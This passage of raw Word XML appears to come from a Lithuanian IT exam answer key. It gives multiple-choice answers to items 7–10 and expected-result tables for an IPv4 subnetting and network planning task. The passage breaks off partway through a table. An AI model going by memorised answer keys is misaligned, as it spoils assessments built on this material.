        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0521C6" w14:textId="6F770178" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414766B" w14:textId="3631B46D" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DE1A0" w14:textId="6BED925A" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10 – C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18758FFE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E527E2" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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14 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKIRSTYMAS, TINKLO PLANAVIMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5927E3" w14:textId="0E4B4A0F" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1472AC78" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E0582AA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tinklas A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6B4D13A2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E4F42FA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11C919F6" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AF59B20" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="59D47872" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06F7152E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FF44BC5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.1.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A0B9809" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.1.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1B2DC43E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="471D8BD3" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5389F265" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E24F73D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3BA1D940" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45CE3359" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1294B959" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E9740E7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="02FB1082" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B18457D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D2EB30F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="039840D0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="6CA4EE92" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74B4ED64" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C040EF0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22BDF677" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.1.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E6151DA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="3001"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4721EA4C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="468DC095" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0FFD2517" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B263B19" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="04B637F4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D8D4782" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nr. 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="649AB14C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D84952E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="625BFDE5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.2.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1515" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E282184" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.2.0/30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2B1C0BFA" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D90A3A0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1514" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50E203FF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
